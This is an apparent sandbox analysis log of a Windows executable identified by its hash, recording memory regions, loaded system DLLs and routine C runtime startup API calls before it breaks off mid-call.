# Flog Txt Version 1 # Analyzer Version: 4.4.0 # Analyzer Build Date: Dec 8 2021 20:04:45 # Log Creation Date: 31.12.2021 18:54:33.222 Process: id = "1" image_name = "eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" filename = "c:\\users\\keecfmwgj\\desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" page_root = "0x48ad4000" os_pid = "0xe10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x390" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 112 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 113 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 114 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 115 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 116 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 117 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 118 start_va = 0x400000 end_va = 0x781fff monitored = 1 entry_point = 0x424a10 region_type = mapped_file name = "eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe") Region: id = 119 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 120 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 121 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 122 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 123 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 124 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 125 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 126 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 127 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 267 start_va = 0x320000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 268 start_va = 0x75220000 end_va = 0x7527bfff monitored = 0 entry_point = 0x7525f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 269 start_va = 0x75280000 end_va = 0x752befff monitored = 0 entry_point = 0x752ae088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 270 start_va = 0x752f0000 end_va = 0x752f7fff monitored = 0 entry_point = 0x752f20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 271 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 272 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 273 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 274 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 275 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 276 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 277 start_va = 0x790000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 278 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 280 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 281 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 282 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 283 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 284 start_va = 0x210000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 285 start_va = 0xa10000 end_va = 0xe1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 286 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 287 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 288 start_va = 0x20000 end_va = 0x28fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 289 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 290 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 291 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 292 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 293 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 294 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 295 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 296 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 297 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 298 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 299 start_va = 0xa10000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 300 start_va = 0x210000 end_va = 0x22dfff monitored = 0 entry_point = 0x22158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 301 start_va = 0x240000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 302 start_va = 0xba0000 end_va = 0xd27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 303 start_va = 0x210000 end_va = 0x22dfff monitored = 0 entry_point = 0x22158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 304 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 305 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 306 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 307 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 308 start_va = 0xd30000 end_va = 0xeb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 309 start_va = 0xec0000 end_va = 0x22bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 310 start_va = 0x743f0000 end_va = 0x7446ffff monitored = 0 entry_point = 0x744037c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 311 start_va = 0x790000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 312 start_va = 0x910000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 313 start_va = 0x790000 end_va = 0x86efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 314 start_va = 0x8a0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 315 start_va = 0x743c0000 end_va = 0x743d2fff monitored = 0 entry_point = 0x743c1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 316 start_va = 0x220000 end_va = 0x222fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 317 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Thread: id = 1 os_tid = 0xe14 [0047.773] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xf2f932a0, dwHighDateTime=0x1d7fe77)) [0047.773] GetCurrentProcessId () returned 0xe10 [0047.773] GetCurrentThreadId () returned 0xe14 [0047.773] GetTickCount () returned 0xf6d7ad [0047.773] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff68 | out: lpPerformanceCount=0x18ff68*=1631109771102) returned 1 [0048.009] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff80, hStdError=0x430d28)) [0048.009] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.009] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x240000 [0048.009] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0048.010] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0048.010] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0048.010] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0048.010] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f [0048.012] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x238) returned 0x2407d0 [0048.012] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0048.012] GetCurrentThreadId () returned 0xe14 [0048.012] GetStartupInfoW (in: lpStartupInfo=0x18fea8 | out: lpStartupInfo=0x18fea8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2407f0, hStdOutput=0x42d6b4, hStdError=0x0)) [0048.012] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x824) returned 0x240a10 [0048.013] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0048.013] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0048.013] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0048.013] SetHandleCount (uNumber=0x20) returned 0x20 [0048.013] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe\" " [0048.013] GetEnvironmentStringsW () returned 0x91ef88* [0048.013] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xb32) returned 0x241240 [0048.013] FreeEnvironmentStringsW (penv=0x91ef88) returned 1 [0048.013] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x773ca0, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe")) returned 0x5f [0048.013] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xec) returned 0x241d80 [0048.014] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xbc) returned 0x241e78 [0048.014] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x62) returned 0x241f40 [0048.014] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x7a) returned 0x241fb0 [0048.014] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x92) returned 0x242038 [0048.014] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x9c) returned 0x2420d8 [0048.014] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x86) returned 0x242180 [0048.014] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x54) returned 0x242210 [0048.014] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x6c) returned 0x242270 [0048.014] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x4c) returned 0x2422e8 [0048.014] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x3e) returned 0x242340 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x58) returned 0x242388 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x80) returned 0x2423e8 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x56) returned 0x242470 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x52) returned 0x2424d0 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x40) returned 0x242530 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x14e) returned 0x242578 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xa0) returned 0x2426d0 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x5a) returned 0x242778 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x5e) returned 0x2427e0 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xb4) returned 0x242848 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x48) returned 0x242908 [0048.015] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x54) returned 0x242958 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x5a) returned 0x2429b8 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x6c) returned 0x242a20 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x76) returned 0x242a98 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x60) returned 0x242b18 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xfa) returned 0x242b80 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x52) returned 0x242c88 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x42) returned 0x242ce8 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x50) returned 0x242d38 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x78) returned 0x242d90 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x76) returned 0x242e10 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x50) returned 0x242e90 [0048.016] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x4a) returned 0x242ee8 [0048.017] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x62) returned 0x242f40 [0048.017] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x48) returned 0x242fb0 [0048.017] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x54) returned 0x243000 [0048.017] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xb0) returned 0x243060 [0048.017] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241240) returned 1 [0048.020] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x241240 | out: hHeap=0x240000) returned 1 [0048.021] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xa4) returned 0x241240 [0048.021] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0048.021] GetLastError () returned 0x0 [0048.021] SetLastError (dwErrCode=0x0) [0048.021] GetLastError () returned 0x0 [0048.021] SetLastError (dwErrCode=0x0) [0048.021] GetLastError () returned 0x0 [0048.021] SetLastError (dwErrCode=0x0) [0048.021] GetACP () returned 0x4e4 [0048.021] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x244) returned 0x2412f0 [0048.021] GetLastError () returned 0x0 [0048.021] SetLastError (dwErrCode=0x0) [0048.021] IsValidCodePage (CodePage=0x4e4) returned 1 [0048.021] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe50 | out: lpCPInfo=0x18fe50) returned 1 [0048.021] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f914 | out: lpCPInfo=0x18f914) returned 1 [0048.021] GetLastError () returned 0x0 [0048.022] SetLastError (dwErrCode=0x0) [0048.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0048.022] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x22c) returned 0x241540 [0048.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x241568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\郝냳㣷⋶) returned 256 [0048.022] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\郝냳㣷⋶, cchSrc=256, lpCharType=0x18fc34 | out: lpCharType=0x18fc34) returned 1 [0048.022] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x241540) returned 1 [0048.023] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x241540 | out: hHeap=0x240000) returned 1 [0048.023] GetLastError () returned 0x0 [0048.023] SetLastError (dwErrCode=0x0) [0048.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0048.023] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x22c) returned 0x241540 [0048.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x241568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\郝냳㣷⋶) returned 256 [0048.023] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\郝냳㣷⋶, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0048.024] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x22c) returned 0x241778 [0048.024] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 